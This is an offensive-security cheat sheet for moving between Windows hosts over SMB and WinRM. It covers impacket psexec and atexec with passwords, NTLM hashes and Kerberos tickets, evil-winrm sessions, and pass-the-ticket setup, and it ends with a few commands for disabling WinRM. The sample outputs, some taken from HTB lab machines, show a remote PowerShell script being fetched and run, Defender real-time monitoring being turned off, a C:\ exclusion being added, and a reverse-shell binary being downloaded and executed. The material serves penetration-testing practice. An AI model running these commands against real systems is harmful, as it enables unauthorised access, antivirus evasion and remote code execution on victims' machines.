TLDRBins TLDRBins / WinRM

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

PsExec - Interactive Shell

Domain

# Password
impacket-psexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>

Sample Output:
TO-DO
# NTLM
impacket-psexec '<DOMAIN>/<USER>@<TARGET> -hashes :<HASH>

Sample Output:
TO-DO
# Password-based Kerberos
impacket-psexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET> -k

Sample Output:
TO-DO
# NTLM-based Kerberos
impacket-psexec '<DOMAIN>/<USER>@<TARGET> -hashes :<HASH> -k

Sample Output:
TO-DO
# Ticket-based Kerberos
impacket-psexec '<DOMAIN>/<USER>@<TARGET> -k -no-pass

Sample Output:
TO-DO

Local auth

# Password
impacket-psexec '<USER>:<PASSWORD>@<TARGET>'

Sample Output:
TO-DO
# NTLM
impacket-psexec '<USER>@<TARGET> -hashes :<HASH>

Sample Output:
TO-DO

AtExec - Run Immediate Scheduled Task

Domain

# Password
impacket-atexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET> 'powershell.exe -c "<CMD>"'

Sample Output:
TO-DO
# NTLM
impacket-atexec '<DOMAIN>/<USER>@<TARGET> -hashes :<HASH> 'powershell.exe -c "<CMD>"'

Sample Output:
TO-DO
# Password-based Kerberos
impacket-atexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET> -k 'powershell.exe -c "<CMD>"'

Sample Output:
TO-DO
# NTLM-based Kerberos
impacket-atexec '<DOMAIN>/<USER>@<TARGET> -hashes :<HASH> -k 'powershell.exe -c "<CMD>"'

Sample Output:
TO-DO
# Ticket-based Kerberos
impacket-atexec '<DOMAIN>/<USER>@<TARGET> -k 'powershell.exe -c "<CMD>"'

Sample Output:
TO-DO

Local Auth

# Password
impacket-atexec '<WORKGROUP>/<USER>:<PASSWORD>@<TARGET> 'powershell.exe -c "<CMD>"'

Sample Output:
impacket-atexec 'WORKGROUP/test:test@192.168.10.2' 'powershell.exe -c "iex(iwr http://192.168.10.1:8443/shell.ps1 -UseBasicParsing)"'

# NTLM
impacket-atexec '<WORKGROUP>/<USER>@<TARGET> -hashes :<HASH> 'powershell.exe -c "<CMD>"'

Sample Output:
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \gNBJCrJi
[*] Running task \gNBJCrJi
[*] Deleting task \gNBJCrJi
[*] Attempting to read ADMIN$\Temp\gNBJCrJi.tmp
                                                                                                                                                            
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -ExclusionPath C:\\"'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \cbUEDAaz
[*] Running task \cbUEDAaz
[*] Deleting task \cbUEDAaz
[*] Attempting to read ADMIN$\Temp\cbUEDAaz.tmp
                                                                                                                                                            
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "iwr 10.8.7.13:8443/rev.exe -outfile C:\programdata\rev.exe"'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \RmSAvink
[*] Running task \RmSAvink
[*] Deleting task \RmSAvink
[*] Attempting to read ADMIN$\Temp\RmSAvink.tmp
                                                                                                                                                            
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "C:\programdata\rev.exe"' 
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \LCpKICMQ
[*] Running task \LCpKICMQ
[*] Deleting task \LCpKICMQ
[*] Attempting to read ADMIN$\Temp\LCpKICMQ.tmp

evil-winrm-py

evil-winrm-py -i <TARGET> -u '<USER>' -p '<PASSWORD>'

Sample Output:
TO-DO
evil-winrm-py -i <TARGET> -u '<USER>' -H '<HASH>'

Sample Output:
TO-DO
# Step 1: Configure '/etc/krb5.conf' (All in UPPERCASE)

[libdefaults]
    default_realm = <DOMAIN>

[realms]
    <DOMAIN> = {
        kdc = <DC>:88
        admin_server = <DC>
        default_domain = <DOMAIN>
    }
    
[domain_realm]
    .domain.internal = <DOMAIN>
    domain.internal = <DOMAIN>

Sample Output:
[libdefaults]
    default_realm = WINDCORP.HTB

[realms]
    WINDCORP.HTB = {
        kdc = HOPE.WINDCORP.HTB:88
        admin_server = HOPE.WINDCORP.HTB
        default_domain = WINDCORP.HTB
    }
    
[domain_realm]
    .domain.internal = WINDCORP.HTB
    domain.internal = WINDCORP.HTB

# Step 2: Request a ticket
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>

Sample Output:
TO-DO
# Step 3: Pass-the-ticket
export KRB5CCNAME=<CCACHE>

Sample Output:
$ export KRB5CCNAME=winrm_user.ccache

# Step 4: Connect
sudo ntpdate -s <DC_IP> && evil-winrm-py -i <TARGET> -u '<USER>' -k --no-pass

Sample Output:
TO-DO
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && evil-winrm-py -i <TARGET> -u '<USER>' -p '<PASSWORD>' -k

Sample Output:
TO-DO
evil-winrm-py -i <TARGET> -u '<USER>' --priv-key-pem <PRIV_KEY_PEM> --cert-pem <CERT_PEM>

Sample Output:
TO-DO
# Port 5986 SSL
sudo ntpdate -s <DC_IP> && evil-winrm-py -i <TARGET> -u '<USER>' -k --no-pass --ssl

Sample Output:
TO-DO

evil-winrm

evil-winrm -i <TARGET> -u '<USER>' -p '<PASSWORD>'

Sample Output:
$ evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'qwe123QWE!@#'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents>

evil-winrm -i <TARGET> -u '<USER>' -H <HASH> 

Sample Output:
TO-DO
# Step 1: Configure '/etc/krb5.conf' (All in UPPERCASE)

[libdefaults]
    default_realm = <DOMAIN>

[realms]
    <DOMAIN> = {
        kdc = <DC>:88
        admin_server = <DC>
        default_domain = <DOMAIN>
    }
    
[domain_realm]
    .domain.internal = <DOMAIN>
    domain.internal = <DOMAIN>

Sample Output:
[libdefaults]
    default_realm = WINDCORP.HTB

[realms]
    WINDCORP.HTB = {
        kdc = HOPE.WINDCORP.HTB:88
        admin_server = HOPE.WINDCORP.HTB
        default_domain = WINDCORP.HTB
    }
    
[domain_realm]
    .domain.internal = WINDCORP.HTB
    domain.internal = WINDCORP.HTB

# Step 2: Request a ticket
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>

Sample Output:
TO-DO
# Step 3: Pass-the-ticket
export KRB5CCNAME=<CCACHE>

Sample Output:
$ export KRB5CCNAME=winrm_user.ccache

# Step 4: Connect
sudo ntpdate -s <DC_IP> && evil-winrm -i <TARGET> -r <DOMAIN>

Sample Output:
$ evil-winrm -i dc.absolute.htb -r absolute.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_user\Documents> 

evil-winrm -i <TARGET> -S -k <KEY> -c <CRT>

Sample Output:
TO-DO

Disable WinRM

Disable-PSRemoting -Force

Sample Output:
TO-DO
Stop-Service WinRM -PassThru

Sample Output:
TO-DO
Set-Service WinRM -StartupType Disabled -PassThru

Sample Output:
TO-DO